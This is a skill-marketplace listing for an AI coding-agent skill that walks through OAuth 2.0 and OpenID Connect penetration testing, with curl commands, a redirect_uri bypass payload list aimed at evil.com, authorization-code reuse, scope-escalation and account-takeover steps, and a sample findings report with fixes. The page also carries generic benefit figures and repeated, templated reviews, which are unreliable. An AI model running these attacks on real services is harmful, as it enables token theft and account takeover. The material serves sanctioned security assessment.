Identifying and exploiting OAuth 2.0 and OpenID Connect misconfigurations including redirect URI manipulation, token leakage, and authorization code theft during security assessments.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionexploiting-oauth-misconfigurationExecute the skills CLI command in your project's root directory to begin installation:
Fetches exploiting-oauth-misconfiguration from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate exploiting-oauth-misconfiguration. Access via /exploiting-oauth-misconfiguration in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | exploiting-oauth-misconfiguration |
| description | Identifying and exploiting OAuth 2.0 and OpenID Connect misconfigurations including redirect URI manipulation, token leakage, and authorization code theft during security assessments. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - penetration-testing - oauth - oidc - authentication - web-security - authorization |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Identify the OAuth grant type, endpoints, and configuration.
# Discover OAuth/OIDC configuration endpoints
curl -s "https://target.example.com/.well-known/openid-configuration" | jq .
curl -s "https://target.example.com/.well-known/oauth-authorization-server" | jq .
# Key endpoints to identify:
# - Authorization endpoint: /oauth/authorize
# - Token endpoint: /oauth/token
# - UserInfo endpoint: /oauth/userinfo
# - JWKS endpoint: /oauth/certs
# Capture the authorization request in Burp
# Typical authorization code flow:
# GET /oauth/authorize?
# response_type=code&
# client_id=CLIENT_ID&
# redirect_uri=https://app.example.com/callback&
# scope=openid profile email&
# state=RANDOM_STATE
# Identify the grant type:
# - Authorization Code: response_type=code
# - Implicit: response_type=token
# - Hybrid: response_type=code+token
# Check for PKCE parameters:
# - code_challenge=...
# - code_challenge_method=S256
Attempt to redirect the authorization code or token to an attacker-controlled domain.
# Test open redirect via redirect_uri
# Original: redirect_uri=https://app.example.com/callback
# Attempt various bypasses:
BYPASSES=(
"https://evil.com"
"https://app.example.com.evil.com/callback"
"https://[email protected]/callback"
"https://app.example.com/callback/../../../evil.com"
"https://evil.com/?.app.example.com"
"https://evil.com#.app.example.com"
"https://app.example.com/callback?next=https://evil.com"
"https://APP.EXAMPLE.COM/callback"
"https://app.example.com/callback%0d%0aLocation:https://evil.com"
"https://app.example.com/CALLBACK"
"http://app.example.com/callback"
"https://app.example.com/callback/../../other-path"
)
for uri in "${BYPASSES[@]}"; do
echo -n "Testing: $uri -> "
status=$(curl -s -o /dev/null -w "%{http_code}" \
"https://auth.target.example.com/oauth/authorize?response_type=code&client_id=APP_ID&redirect_uri=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$uri'))")&scope=openid&state=test123")
echo "$status"
done
# If redirect_uri validation is path-based, try path traversal
# redirect_uri=https://app.example.com/callback/../attacker-controlled-path
# If subdomain matching, try subdomain takeover + redirect
# redirect_uri=https://abandoned-subdomain.example.com/
Exploit leakage vectors for stealing OAuth tokens and codes.
# Test token leakage via Referer header
# If implicit flow returns token in URL fragment:
# https://app.example.com/callback#access_token=TOKEN
# And the callback page loads external resources,
# the Referer header may leak the URL with the token
# Test for authorization code leakage via Referer
# After receiving code at callback, check if:
# 1. Page loads external images/scripts
# 2. Page has links to external sites
# Burp: Check Proxy History for Referer headers containing "code="
# Test authorization code reuse
CODE="captured_auth_code"
# First use
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=authorization_code&code=$CODE&redirect_uri=https://app.example.com/callback&client_id=APP_ID&client_secret=APP_SECRET"
# Second use (should fail but may not)
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=authorization_code&code=$CODE&redirect_uri=https://app.example.com/callback&client_id=APP_ID&client_secret=APP_SECRET"
# Test state parameter absence/predictability
# Remove state parameter entirely
curl -s "https://auth.target.example.com/oauth/authorize?response_type=code&client_id=APP_ID&redirect_uri=https://app.example.com/callback&scope=openid"
# If no error, CSRF on OAuth flow is possible
Attempt to gain more permissions than intended.
# Request additional scopes beyond what's needed
curl -s "https://auth.target.example.com/oauth/authorize?response_type=code&client_id=APP_ID&redirect_uri=https://app.example.com/callback&scope=openid+profile+email+admin+write+delete&state=test123"
# Test with elevated scope on token exchange
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=authorization_code&code=$CODE&redirect_uri=https://app.example.com/callback&client_id=APP_ID&client_secret=APP_SECRET&scope=admin"
# Test token with manipulated claims
# If JWT access token, try modifying claims (see JWT testing skill)
# Test refresh token scope escalation
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=refresh_token&refresh_token=$REFRESH_TOKEN&client_id=APP_ID&scope=admin+write"
# Test client credential flow with elevated permissions
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=client_credentials&client_id=APP_ID&client_secret=APP_SECRET&scope=admin"
Exploit OAuth flows to take over victim accounts.
# Test missing email verification on OAuth provider
# 1. Create an account on the OAuth provider with victim's email
# 2. OAuth login to the target app
# 3. If the app trusts the unverified email, account linking occurs
# Test pre-authentication account linking
# 1. Register on target app with victim's email (no OAuth)
# 2. Attacker links their OAuth account to victim's email
# 3. Attacker can now login via OAuth to victim's account
# CSRF on account linking
# If /oauth/link endpoint lacks CSRF protection:
# 1. Attacker initiates OAuth flow, captures the auth code
# 2. Craft a page that submits the code to victim's session
# 3. Victim's account gets linked to attacker's OAuth account
# Test token substitution
# Use authorization code/token from one client_id with another
curl -s -X POST "https://auth.target.example.com/oauth/token" \
-d "grant_type=authorization_code&code=$CODE_FROM_APP_A&redirect_uri=https://app-b.example.com/callback&client_id=APP_B_ID&client_secret=APP_B_SECRET"
Assess the security of OAuth credentials and tokens.
# Check for exposed client secrets
# Search JavaScript source code
curl -s "https://target.example.com/static/app.js" | grep -i "client_secret\|clientSecret\|client_id"
# Check mobile app decompilation for hardcoded secrets
# Test token revocation
ACCESS_TOKEN="captured_access_token"
# Use the token
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
"https://api.target.example.com/me"
# Revoke the token
curl -s -X POST "https://auth.target.example.com/oauth/revoke" \
-d "token=$ACCESS_TOKEN&token_type_hint=access_token"
# Test if revoked token still works
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
"https://api.target.example.com/me"
# Test token lifetime
# Decode JWT access token and check exp claim
echo "$ACCESS_TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | jq .exp
# Long-lived tokens (hours/days) increase attack window
# Check PKCE implementation
# If public client without PKCE, authorization code interception is possible
| Concept | Description |
|---|---|
| Authorization Code Flow | Most secure OAuth flow; exchanges short-lived code for tokens server-side |
| Implicit Flow | Deprecated flow returning tokens directly in URL fragment; vulnerable to leakage |
| PKCE | Proof Key for Code Exchange; prevents authorization code interception attacks |
| Redirect URI Validation | Server-side validation that the redirect_uri matches registered values |
| State Parameter | Random value binding the OAuth request to the user's session, preventing CSRF |
| Scope Escalation | Requesting or obtaining more permissions than authorized |
| Token Leakage | Exposure of OAuth tokens via Referer headers, logs, or browser history |
| Open Redirect | Using OAuth redirect_uri as an open redirect to steal tokens |
| Tool | Purpose |
|---|---|
| Burp Suite Professional | Intercepting OAuth redirect chains and modifying parameters |
| OWASP ZAP | Automated OAuth flow scanning |
| Postman | Manual OAuth flow testing with environment variables |
| oauth-tools.com | Online OAuth flow debugging and testing |
| jwt.io | JWT token analysis for OAuth access tokens |
| Browser DevTools | Monitoring network requests and redirect chains |
The OAuth provider validates redirect_uri against *.example.com. An attacker finds a subdomain vulnerable to takeover (old.example.com), takes it over, and steals authorization codes redirected to it.
The OAuth login flow does not include or validate a state parameter. An attacker crafts a link that logs the victim into the attacker's account, enabling account confusion attacks.
The application uses the implicit flow, receiving the access token in the URL fragment. The callback page loads a third-party analytics script, and the token leaks via the Referer header.
The OAuth provider does not invalidate authorization codes after first use. An attacker who intercepts a code via Referer leakage can exchange it for an access token even after the legitimate user has completed the flow.
## OAuth Security Assessment Report
**Vulnerability**: Redirect URI Validation Bypass
**Severity**: High (CVSS 8.1)
**Location**: GET /oauth/authorize - redirect_uri parameter
**OWASP Category**: A07:2021 - Identification and Authentication Failures
### OAuth Configuration
| Property | Value |
|----------|-------|
| Grant Type | Authorization Code |
| PKCE | Not implemented |
| State Parameter | Present but predictable |
| Token Type | JWT (RS256) |
| Token Lifetime | 1 hour |
| Refresh Token | 30 days |
### Findings
| Finding | Severity |
|---------|----------|
| Redirect URI path traversal bypass | High |
| Missing PKCE on public client | High |
| Authorization code reusable | Medium |
| State parameter uses sequential values | Medium |
| Client secret exposed in JavaScript | Critical |
| Token not revoked after password change | Medium |
### Recommendation
1. Implement strict redirect_uri validation with exact string matching
2. Require PKCE for all clients (especially public/mobile clients)
3. Invalidate authorization codes after first use
4. Use cryptographically random state parameters tied to user sessions
5. Migrate from implicit flow to authorization code flow with PKCE
6. Never expose client secrets in client-side code
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Registry listing for exploiting-oauth-misconfiguration matched our evaluation — installs cleanly and behaves as described in the markdown.
I recommend exploiting-oauth-misconfiguration for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
Solid pick for teams standardizing on skills: exploiting-oauth-misconfiguration is focused, and the summary matches what you get after install.
exploiting-oauth-misconfiguration has been reliable in day-to-day use. Documentation quality is above average for community skills.
exploiting-oauth-misconfiguration reduced setup friction for our internal harness; good balance of opinion and flexibility.
Keeps context tight: exploiting-oauth-misconfiguration is the kind of skill you can hand to a new teammate without a long onboarding doc.
Registry listing for exploiting-oauth-misconfiguration matched our evaluation — installs cleanly and behaves as described in the markdown.
Useful defaults in exploiting-oauth-misconfiguration — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
I recommend exploiting-oauth-misconfiguration for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
exploiting-oauth-misconfiguration has been reliable in day-to-day use. Documentation quality is above average for community skills.
showing 1-10 of 42